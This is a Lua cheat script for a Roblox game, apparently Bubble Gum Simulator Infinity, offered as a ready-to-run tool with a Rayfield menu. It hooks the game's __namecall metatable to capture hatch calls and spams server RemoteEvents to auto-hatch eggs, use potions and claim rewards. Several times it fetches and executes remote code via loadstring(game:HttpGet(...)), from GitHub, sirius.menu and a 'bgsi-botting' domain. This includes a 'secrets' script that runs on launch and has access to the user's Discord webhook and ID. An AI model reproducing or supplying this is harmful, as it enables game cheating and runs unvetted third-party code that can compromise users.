--==================================================
-- CONFIG + WEBHOOK SCRIPT LOADER
--==================================================

-- Ensure a shared config exists (keep this, it's separate from Rayfield configs)
getgenv().Config = getgenv().Config or {}
local cfg = getgenv().Config

-- Set defaults only if they aren't already set
if cfg.Webhook_enabled == nil then
    cfg.Webhook_enabled = true
end
if cfg.Discord_ID == nil then
    cfg.Discord_ID = ""
end
if cfg.Webhook == nil then
    cfg.Webhook = ""
end
if cfg.Ignore_AutoDeleted == nil then
    cfg.Ignore_AutoDeleted = false
end
if cfg.Secret_Only == nil then
    cfg.Secret_Only = true
end

-- AntiAFK defaults
if cfg.AntiAFK == nil then
    cfg.AntiAFK = false
end
if cfg.AntiAFKScript == nil then
    cfg.AntiAFKScript = "https://raw.githubusercontent.com/SamF-Web/bgsi-roblox-scripts/refs/heads/main/antiafk.lua"
end

-- ⭐ Playtime claimer defaults
if cfg.ClaimPlaytime == nil then
    cfg.ClaimPlaytime = true
end
if cfg.PlaytimeScript == nil then
    cfg.PlaytimeScript = "https://raw.bgsi-botting.xyz/core/playtime.lua"
end

-- ⭐ Winter script & Event zone defaults
if cfg.WinterScript == nil then
    cfg.WinterScript = "https://raw.githubusercontent.com/Tappp12/bgsi/refs/heads/main/winter"
end
if cfg.EventZone == nil then
    cfg.EventZone = "First" -- Options: "First", "Second", "Third"
end
if cfg.ChristmasFarm == nil then
    cfg.ChristmasFarm = true
end
if cfg.FestivalSpin == nil then
    cfg.FestivalSpin = true
end

-- Point to your secrets/webhook script
cfg.WebhookScript = cfg.WebhookScript or "https://raw.githubusercontent.com/Tappp12/bgsi/refs/heads/main/secrets"

-- Load the webhook / secrets logic
local success, err = pcall(function()
    loadstring(game:HttpGet(cfg.WebhookScript))()
end)

if not success then
    warn("[BGSI GUI] Failed to load webhook script:", err)
end

-- ⭐ Optionally auto-load playtime claimer on script start if enabled
if cfg.ClaimPlaytime then
    local ok, errPT = pcall(function()
        loadstring(game:HttpGet(cfg.PlaytimeScript))()
    end)
    if not ok then
        warn("[BGSI GUI] Failed to load Playtime claimer script:", errPT)
    else
        print("[BGSI GUI] Playtime claimer started on launch.")
    end
end

--==================================================
-- RAYFIELD UI LOADER
--==================================================

local Rayfield = loadstring(game:HttpGet("https://sirius.menu/rayfield"))()

--==================================================
-- VARIABLES
--==================================================

-- Auto potion variables
local autoPotionEnabled = false
local selectedPotion = "Mythic" -- default

-- ⭐ Fast Hatch variables
local fastHatchEnabled = false
local lastEggName = nil
local lastEggCount = nil

-- ⭐ Season pass claimer toggle
local autoClaimSeason = false

-- RemoteEvent Reference (safer with WaitForChild chain)
local remote = game:GetService("ReplicatedStorage")
    :WaitForChild("Shared")
    :WaitForChild("Framework")
    :WaitForChild("Network")
    :WaitForChild("Remote")
    :WaitForChild("RemoteEvent")

-- ⭐ Hook __namecall to detect when the game hatches an egg
do
    local mt = getrawmetatable(game)
    local oldNamecall = mt.__namecall
    setreadonly(mt, false)

    mt.__namecall = newcclosure(function(self, ...)
        local args = {...}
        local method = getnamecallmethod()

        -- When the game calls: remote:FireServer("HatchEgg", EggName, Count)
        if method == "FireServer" and self == remote and args[1] == "HatchEgg" then
            lastEggName = args[2]
            lastEggCount = args[3]
            print("[BGSI GUI] Last egg set to:", lastEggName, lastEggCount)
        end

        return oldNamecall(self, ...)
    end)

    setreadonly(mt, true)
end

--==================================================
-- WINDOW (NO RAYFIELD CONFIG SAVE)
--==================================================

local Window = Rayfield:CreateWindow({
    Name = "BGSI Auto Hatch + Webhook",
    LoadingTitle = "BGSI GUI",
    LoadingSubtitle = "Auto Hatch & Webhook Controls",
    -- ConfigurationSaving removed
})

--==================================================
-- TABS
--==================================================

local MainTab = Window:CreateTab("Hatching", 4483362458)
local WebhookTab = Window:CreateTab("Webhook", 4483362458)
local SettingsTab = Window:CreateTab("Settings", "settings")

--==================================================
-- HATCHING TAB
--==================================================

-- ⭐ Universal Fast Hatch toggle (uses last hatched egg)
MainTab:CreateToggle({
    Name = "Auto Hatch Last Egg",
    CurrentValue = false,
    Flag = "FastHatch",
    Callback = function(Value)
        fastHatchEnabled = Value
        print("[BGSI GUI] Fast hatch enabled:", fastHatchEnabled)
    end
})

--================ WINTER EVENT CONTROLS ================

MainTab:CreateDropdown({
    Name = "Event Zone",
    Options = {"First", "Second", "Third"},
    CurrentOption = {cfg.EventZone},
    Flag = "EventZone",
    Callback = function(Option)
        if type(Option) == "table" then
            cfg.EventZone = Option[1]
        else
            cfg.EventZone = Option
        end
        print("[BGSI GUI] Event zone set to: " .. cfg.EventZone)
    end
})

MainTab:CreateToggle({
    Name = "Enable Christmas Farm (auto teleport)",
    CurrentValue = cfg.ChristmasFarm,
    Flag = "ChristmasFarm",
    Callback = function(Value)
        cfg.ChristmasFarm = Value
        print("[BGSI GUI] Christmas Farm enabled: " .. tostring(Value))
    end
})

MainTab:CreateToggle({
    Name = "Enable Festival Spin",
    CurrentValue = cfg.FestivalSpin,
    Flag = "FestivalSpin",
    Callback = function(Value)
        cfg.FestivalSpin = Value
        print("[BGSI GUI] Festival Spin enabled: " .. tostring(Value))
    end
})

MainTab:CreateButton({
    Name = "Run Winter Event Script",
    Callback = function()
        local ok, errW = pcall(function()
            loadstring(game:HttpGet(cfg.WinterScript))()
        end)

        if not ok then
            warn("[BGSI GUI] Failed to load Winter script:", errW)
            Rayfield:Notify({
                Title = "Winter Script Error",
                Content = "Failed to load: " .. tostring(errW),
                Duration = 5,
                Image = "alert-triangle"
            })
        else
            Rayfield:Notify({
                Title = "Winter Script Activated",
                Content = "Winter event script loaded with your settings.",
                Duration = 3,
                Image = "snowflake"
            })
        end
    end
})

-- 🔹 Anti AFK Toggle
MainTab:CreateToggle({
    Name = "Enable Anti AFK",
    CurrentValue = cfg.AntiAFK,
    Flag = "AntiAFK",
    Callback = function(Value)
        cfg.AntiAFK = Value

        if Value then
            local ok, err2 = pcall(function()
                loadstring(game:HttpGet(cfg.AntiAFKScript))()
            end)

            if not ok then
                warn("[BGSI GUI] Failed to load AntiAFK script:", err2)
            else
                print("[BGSI GUI] AntiAFK script started.")
            end
        else
            print("[BGSI GUI] AntiAFK turned OFF in config (rejoin to fully stop AntiAFK loop).")
        end
    end
})

-- 🔹 Auto Potion Dropdown
MainTab:CreateDropdown({
    Name = "Auto Potion Type",
    Options = {"Mythic", "Coins", "Lucky", "Speed"},
    CurrentOption = {"Mythic"},
    Flag = "PotionType",
    Callback = function(Option)
        if type(Option) == "table" then
            selectedPotion = Option[1]
        else
            selectedPotion = Option
        end

        print("[BGSI GUI] Selected potion:", selectedPotion)
    end
})

-- 🔹 Auto Potion Toggle
MainTab:CreateToggle({
    Name = "Auto Use Potion (every 0.15s)",
    CurrentValue = false,
    Flag = "AutoPotion",
    Callback = function(Value)
        autoPotionEnabled = Value
        print("[BGSI GUI] Auto Potion Enabled:", autoPotionEnabled)
    end
})

-- ⭐ Playtime GUI toggle
MainTab:CreateToggle({
    Name = "Auto-claim Playtime Rewards",
    CurrentValue = cfg.ClaimPlaytime,
    Flag = "ClaimPlaytime",
    Callback = function(Value)
        cfg.ClaimPlaytime = Value

        if Value then
            local ok, errPT = pcall(function()
                loadstring(game:HttpGet(cfg.PlaytimeScript))()
            end)
            if not ok then
                warn("[BGSI GUI] Failed to load Playtime claimer script:", errPT)
            else
                print("[BGSI GUI] Playtime claimer started.")
            end
        else
            print("[BGSI GUI] Playtime claimer disabled (rejoin to fully stop it).")
        end
    end
})

--==================================================
-- WEBHOOK TAB
--==================================================

WebhookTab:CreateToggle({
    Name = "Enable Webhook Alerts",
    CurrentValue = cfg.Webhook_enabled,
    Flag = "WebhookEnabled",
    Callback = function(Value)
        cfg.Webhook_enabled = Value
    end
})

WebhookTab:CreateToggle({
    Name = "Secret Only Webhooks",
    CurrentValue = cfg.Secret_Only,
    Flag = "SecretOnly",
    Callback = function(Value)
        cfg.Secret_Only = Value
    end
})

WebhookTab:CreateInput({
    Name = "Discord User ID (for ping)",
    PlaceholderText = cfg.Discord_ID ~= "" and cfg.Discord_ID or "12345678",
    RemoveTextAfterFocusLost = false,
    Flag = "DiscordID",
    Callback = function(Text)
        cfg.Discord_ID = Text
    end
})

WebhookTab:CreateInput({
    Name = "Webhook URL",
    PlaceholderText = (cfg.Webhook ~= "" and "Webhook set" or "https://discord.com/api/webhooks/..."),
    RemoveTextAfterFocusLost = false,
    Flag = "WebhookURL",
    Callback = function(Text)
        cfg.Webhook = Text
    end
})

WebhookTab:CreateParagraph({
    Title = "Info",
    Content = "Auto Deleted pets are automatically ignored and not send to webhook💥"
})

-- ⭐ Season Pass Auto-Claim Toggle
WebhookTab:CreateToggle({
    Name = "Auto-Claim Season Pass",
    CurrentValue = false,
    Flag = "ClaimSeason",
    Callback = function(Value)
        autoClaimSeason = Value
        print("[BGSI GUI] Auto-Claim Season Pass:", autoClaimSeason)
    end
})

--==================================================
-- SETTINGS TAB (EMPTY FOR NOW, NO CONFIG SYSTEM)
--==================================================

SettingsTab:CreateParagraph({
    Title = "Config System Disabled",
    Content = "Rayfield configuration saving is currently disabled in this build."
})

--==================================================
-- UNIVERSAL FAST HATCH LOOP
--==================================================
task.spawn(function()
    while true do
        if fastHatchEnabled and lastEggName and lastEggCount then
            remote:FireServer("HatchEgg", lastEggName, lastEggCount)
        end
        task.wait(0.05)
    end
end)

--==================================================
-- AUTO POTION LOOP
--==================================================
task.spawn(function()
    while true do
        if autoPotionEnabled and selectedPotion then
            if selectedPotion == "Mythic" then
                remote:FireServer("UsePotion", "Mythic", 2, 10)
            elseif selectedPotion == "Coins" then
                remote:FireServer("UsePotion", "Coins", 2, 10)
            elseif selectedPotion == "Lucky" then
                remote:FireServer("UsePotion", "Lucky", 2, 10)
            elseif selectedPotion == "Speed" then
                remote:FireServer("UsePotion", "Speed", 2, 10)
            end
        end

        task.wait(0.15)
    end
end)

-- ⭐ AUTO SEASON-PASS CLAIM LOOP
task.spawn(function()
    while true do
        if autoClaimSeason then
            remote:FireServer("ClaimSeason")
        end
        task.wait(5)
    end
end)
